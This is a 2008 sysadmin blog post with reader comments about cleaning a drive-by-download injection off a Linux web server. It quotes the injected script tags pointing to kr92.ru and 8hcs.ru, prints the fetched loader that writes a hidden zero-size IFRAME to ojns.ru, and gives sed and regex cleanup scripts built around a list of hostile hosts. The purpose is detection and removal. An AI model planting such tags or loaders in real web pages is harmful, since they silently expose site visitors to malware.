Tuesday, August 05, 2008

Malware Attack

Last Wednesday, my colleague was telling me that one of our servers was attacked by Malware and his Firefox 3 browser "Reported Attack Site!"

I was wondering how they knew that our server was suspected of serving malware. After some Googling, I found the following articles very useful in understanding this type of attack, called a Drive-by Download.

Basically, there are a couple of ways a malware script can end up embedded in your server:

  • public forums that allow users to embed arbitrary HTML such as IFRAME or SCRIPT tags
  • advertisements from untrusted sources; it is difficult to maintain trust along such long advertisement delivery chains
  • exploiting a vulnerability in the browser or one of its plugins
  • exploiting a vulnerability in the server

Today, my boss was telling us that the Linux server is under malware attack and asked whether I 'know' Linux. Whenever people ask whether I 'know' something, I need them to define 'know'. Anyway, this is a golden opportunity for me to have a first-hand 'encounter' with malware. After traversing the directory tree, I found 200+ web pages that had this JavaScript embedded at the end of the page:
<script src=http://www.kr92.ru/fgg.js></script>
This pattern tallies with what the above articles described. It is time to clean up all these pages. I remember this blog showed a very handy way to edit a file using sed without having to create a temporary file: the "-i" flag in sed allows you to edit the file in place (FYI, sed in Solaris does not have this flag). Here is my on-the-fly script:

#! /bin/sh

# For every .html/.htm file under the current directory, strip the injected
# script tag in place with GNU sed -i and confirm it is gone afterwards.
for i in `find . -type f \( -name "*.html" -o -name "*.htm" \)`
do
        grep "www.kr92.ru" $i > /dev/null 2>&1
        if [ $? -eq 0 ]; then
                echo "Removing www.kr92.ru - $i ..."
                sed -i -e 's#<script src=http://www.kr92.ru/fgg.js></script>##' $i
                grep "www.kr92.ru" $i > /dev/null 2>&1
                if [ $? -eq 0 ]; then
                        echo Unsuccessful
                else
                        echo OK
                fi
        fi
done

Want to find out what is inside http://www.kr92.ru/fgg.js?

$ curl http://www.kr92.ru/fgg.js
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
document.cookie = "v1goo=update;expires="+expires.toGMTString();
document.write("<iframe src=http://ojns.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}

Apparently it is trying to include an IFRAME (http://ojns.ru/cgi-bin/index.cgi?ad) of zero width by zero height in your page. The cookie check on "v1goo" means the hidden IFRAME is only written on a visitor's first visit, which makes the injection harder to notice when you reload the page.

According to this article, 200+ different forms of script reference have been reported. Scary, isn't it? While I was writing this blog, my boss told me that the main page has this embedded:
<script src=http://www.8hcs.ru/js.js></script>

Likely I will have to modify my script to cater for the various forms of script reference, using some regular expression matching to catch all those culprits.
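The following is an added example, not the script from the post, showing what the regular-expression version of the cleanup above looks like: a detection pass that lists infected pages without touching them, then an in-place cleanup that re-checks each file, covering the quoted and unquoted tag forms and both hostile hosts named in the post. It assumes GNU sed (for -i and -E), grep -E, find and mktemp; the host list is taken from the post and the sample pages are constructed here.

```shell
#!/bin/sh
# Added example (not the original post's script): detect, then strip, injected
# remote <script src=...></script> tags from static HTML files.
# Assumptions: GNU sed (-i and -E; the post notes Solaris sed lacks -i), grep -E,
# find and mktemp. The host list comes from the post; the sample pages are constructed.

# Hostile hosts seen in the post, space separated. Extend as new ones turn up.
BAD_HOSTS="www.kr92.ru www.8hcs.ru"

# Turn "a.b c.d" into the ERE alternation "a\.b|c\.d".
host_regex() {
    printf '%s' "$BAD_HOSTS" | sed -e 's/\./\\./g' -e 's/ /|/g'
}

# One ERE covering the variants seen: optional quotes, http or https, any path on a listed host.
PATTERN="<script[[:space:]]+src=[\"']?https?://($(host_regex))/[^>\"' ]*[\"']?></script>"

# Detection only: print each .html/.htm file under $1 that carries an injected tag.
find_infected() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' \) -print |
    while IFS= read -r f; do
        if grep -Eq "$PATTERN" "$f"; then printf '%s\n' "$f"; fi
    done
}

# Number of infected files under $1 (tr strips the padding some wc builds emit).
count_infected() {
    find_infected "$1" | wc -l | tr -d ' '
}

# Cleanup: remove every injected tag in place and re-check each file afterwards.
clean_infected() {
    find_infected "$1" | while IFS= read -r f; do
        echo "Removing injected script tag(s) - $f ..."
        sed -E -i "s#$PATTERN##g" "$f"
        if grep -Eq "$PATTERN" "$f"; then echo "Unsuccessful: $f"; else echo "OK: $f"; fi
    done
}

# Constructed sample site: two infected pages (an unquoted tag at the end of the
# body, a quoted tag in the head) and one page with only a legitimate local
# script that must survive the cleanup untouched.
make_sample_site() {
    site=$(mktemp -d)
    printf '<html><body>hello</body></html>\n<script src=http://www.kr92.ru/fgg.js></script>\n' > "$site/index.html"
    printf '<html><head><script src="http://www.8hcs.ru/js.js"></script></head><body>about</body></html>\n' > "$site/about.htm"
    printf '<html><head><script src="/js/app.js"></script></head><body>clean</body></html>\n' > "$site/clean.html"
    printf '%s\n' "$site"
}

# Stand-alone run against the constructed site.
demo_site=$(make_sample_site)
echo "Infected before cleanup: $(count_infected "$demo_site")"
clean_infected "$demo_site"
echo "Infected after cleanup: $(count_infected "$demo_site")"
rm -rf "$demo_site"
```

Run the detection pass (find_infected) and review its output before running clean_infected, and take a backup or snapshot of the document root first; sed -i rewrites files with no undo. Matching on a list of known hostile hosts rather than on "any remote script" keeps legitimate third-party scripts intact, at the cost of having to extend BAD_HOSTS each time a new host such as www.8hcs.ru turns up.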



Blogger Colleen said...

I would love to know a couple of the files you were finding this in so I can check on my site and see if I'm finding anything familiar.

3:18 AM  
Blogger chihungchan said...

See my new post http://chihungchan.blogspot.com/2010/05/malware-attack-reply-comment.html

9:40 PM  
